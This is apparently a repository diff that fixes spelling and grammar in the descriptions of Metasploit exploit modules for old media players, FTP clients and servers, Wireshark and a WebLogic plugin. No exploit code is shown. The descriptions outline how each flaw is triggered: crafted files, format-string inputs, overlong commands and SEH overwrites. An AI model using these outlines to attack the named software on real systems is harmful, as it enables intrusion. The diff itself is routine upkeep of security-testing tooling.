This module exploits a stack based overflow in VUPlayer <= 2.49. When
|
||||
the application is used to open a specially crafted cue file, a buffer is overwritten allowing
|
||||
for the execution of arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
|
|
|
@ -15,9 +15,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Description' => %q{
|
||||
This module exploits a stack based buffer overflow in Winamp 5.55. The flaw
|
||||
exists in the gen_ff.dll and occurs while parsing a specially crafted MAKI file,
|
||||
where memmove is used with in a insecure way with user controlled data.
|
||||
where memmove is used in an insecure way with user controlled data.
|
||||
|
||||
To exploit the vulnerability the attacker must convince the attacker to install the
|
||||
To exploit the vulnerability the attacker must convince the victim to install the
|
||||
generated mcvcore.maki file in the "scripts" directory of the default "Bento" skin,
|
||||
or generate a new skin using the crafted mcvcore.maki file. The module has been
|
||||
tested successfully on Windows XP SP3 and Windows 7 SP1.
|
||||
|
|
|
@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Name' => 'Wireshark wiretap/mpeg.c Stack Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5
|
||||
by generating an malicious file.)
|
||||
by generating a malicious file.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
|
|
|
@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
This module exploits a stack-based buffer overflow in the Zinf Audio Player 2.2.1.
|
||||
An attacker must send the file to victim and the victim must open the file.
|
||||
Alternatively it may be possible to execute code remotely via an embedded
|
||||
PLS file within a browser, when the PLS extention is registered to Zinf.
|
||||
PLS file within a browser, when the PLS extension is registered to Zinf.
|
||||
This functionality has not been tested in this module.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
|
|
|
@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Name' => 'ComSndFTP v1.3.7 Beta USER Format String (Write4) Vulnerability',
|
||||
'Description' => %q{
|
||||
This module exploits the ComSndFTP FTP Server version 1.3.7 beta by sending a specially
|
||||
crafted format string specifier as a username. The crafted username is sent to to the server to
|
||||
crafted format string specifier as a username. The crafted username is sent to the server to
|
||||
overwrite the hardcoded function pointer from Ws2_32.dll!WSACleanup. Once this function pointer
|
||||
is triggered, the code bypasses dep and then repairs the pointer to execute arbitrary code.
|
||||
The SEH exit function is preferred so that the administrators are not left with an unhandled
|
||||
|
|
|
@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
PASS command. This may allow a remote attacker to cause a buffer overflow,
|
||||
resulting in a denial of service or allow the execution of arbitrary code.
|
||||
|
||||
FreeFTPd must have an account set to authorization anonymous user account.
|
||||
freeFTPd must have an account set to authorization anonymous user account.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
|
|
|
@ -14,8 +14,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Name' => 'FTPShell 5.1 Stack Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in FTPShell 5.1. The overflow gets
|
||||
triggered when the ftp clients tries to process an overly response to a PWD command.
|
||||
This will overwrite the saved EIP and structured exception handler.
|
||||
triggered when the ftp client tries to process an overly long response to a PWD
|
||||
command. This will overwrite the saved EIP and structured exception handler.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
|
|
|
@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Name' => 'HTTPDX tolog() Function Format String Vulnerability',
|
||||
'Description' => %q{
|
||||
This module exploits a format string vulnerability in HTTPDX FTP server.
|
||||
By sending an specially crafted FTP command containing format specifiers, an
|
||||
By sending a specially crafted FTP command containing format specifiers, an
|
||||
attacker can corrupt memory and execute arbitrary code.
|
||||
|
||||
By default logging is off for HTTP, but enabled for the 'moderator' user
|
||||
|
|
|
@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Description' => %q{
|
||||
This module exploits a buffer overflow vulnerability found in the PUT command of the
|
||||
PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous
|
||||
credientials are enabled.
|
||||
credentials are enabled.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
|
|
|
@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
vulnerability that is triggered when processing a sufficiently long
|
||||
filename during a FTP LIST command resulting in overwriting the
|
||||
exception handler. Social engineering of executing a specially crafted
|
||||
ftp file by double click will result in connecting to our malcious
|
||||
ftp file by double click will result in connecting to our malicious
|
||||
server and perform arbitrary code execution which allows the attacker to
|
||||
gain the same rights as the user running ScriptFTP. This vulnerability
|
||||
affects versions 3.3 and earlier.
|
||||
|
|
|
@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Name' => 'Seagull FTP v3.3 Build 409 Stack Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow in the Seagull FTP client that gets
|
||||
triggered when the ftp clients processes a response to a LIST command. If the
|
||||
triggered when the ftp client processes a response to a LIST command. If the
|
||||
response contains an overly long file/folder name, a buffer overflow occurs,
|
||||
overwriting a structured exception handler.
|
||||
},
|
||||
|
|
|
@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Name' => 'Vermillion FTP Daemon PORT Command Memory Corruption',
|
||||
'Description' => %q{
|
||||
This module exploits an out-of-bounds array access in the Arcane Software
|
||||
Vermillion FTP server. By sending an specially crafted FTP PORT command,
|
||||
Vermillion FTP server. By sending a specially crafted FTP PORT command,
|
||||
an attacker can corrupt stack memory and execute arbitrary code.
|
||||
|
||||
This particular issue is caused by processing data bound by attacker
|
||||
|
@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
Processing is done using a source ptr (p) and a destination pointer (q).
|
||||
The vulnerable function walks the input string and continues while the
|
||||
source byte is non-null. If a comma is encountered, the function increments
|
||||
the the destination pointer. If an ascii digit [0-9] is encountered, the
|
||||
the destination pointer. If an ascii digit [0-9] is encountered, the
|
||||
following occurs:
|
||||
|
||||
*q = (*q * 10) + (*p - '0');
|
||||
|
|
|
@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in Xlink FTP Client 32
|
||||
Version 3.01 that comes bundled with Omni-NFS Enterprise 5.2.
|
||||
When a overly long FTP server response is recieved by a client,
|
||||
When an overly long FTP server response is received by a client,
|
||||
arbitrary code may be executed.
|
||||
},
|
||||
'Author' => [ 'MC' ],
|
||||
|
|
|
@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Description' => %q{
|
||||
This module exploits a buffer overflow in BEA's WebLogic plugin. The vulnerable
|
||||
code is only accessible when clustering is configured. A request containing a
|
||||
long JSESSION cookie value can lead to arbirtary code execution.
|
||||
long JSESSION cookie value can lead to arbitrary code execution.
|
||||
},
|
||||
'Author' => 'pusscat',
|
||||
'References' =>
|
||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue